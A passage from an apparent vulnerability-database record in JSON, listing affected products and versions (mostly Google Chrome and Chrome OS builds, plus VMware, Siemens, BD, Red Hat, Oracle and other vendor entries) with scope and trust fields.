        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1024"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.276.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.117"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.112"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.933.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.121"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.642.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.574.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.936.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.317.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "39.0.2171.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.320.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.946.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.888.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.5"
      },
      {
        "model": "security analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1307.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.224.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1678.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.33"
      },
      {
        "model": "ruggedcom ape",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.704.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.149"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.60"
      },
      {
        "model": "bactec fx40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1035"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.288.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1291.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9"
      },
      {
        "model": "vcloud usage meter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.3.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.57"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.632.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.158"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.154"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.328"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.889.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.2"
      },
      {
        "model": "simatic et 200sp open controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.899.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1029"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.571.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.79"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1016070"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1677.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.19"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.911.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.734.0"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.954.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.667.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1310.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.34"
      },
      {
        "model": "pyxis transfusion verification",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.131.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.342"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.93"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.35"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.4.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.485.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.678.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.372.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.91"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.949.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.638.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.99"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.392.0"
      },
      {
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.212"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.302.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1063"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.710.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.206"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.289.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.96"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1685.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.568.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.735.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.487.0"
      },
      {
        "model": "workstation",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "12.5.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.302.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.129"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.124"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.9"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.590.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.113"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.827.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.23"
      },
      {
        "model": "carrier routing system 6.6.0.base",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.332.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.107"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.953.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.666.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1071.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1013.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.83"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.73"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "61.0.3163.113"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.275.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.340.0"
      },
      {
        "model": "facsaria fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.373.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.87"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.32"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.0"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.353.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "61.0.3163.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.43"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.84"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.461.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.470.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1285.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.446.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.357.0"
      },
      {
        "model": "enterprise linux for power big endian extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.459.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.541.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.221"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.333.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.779.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
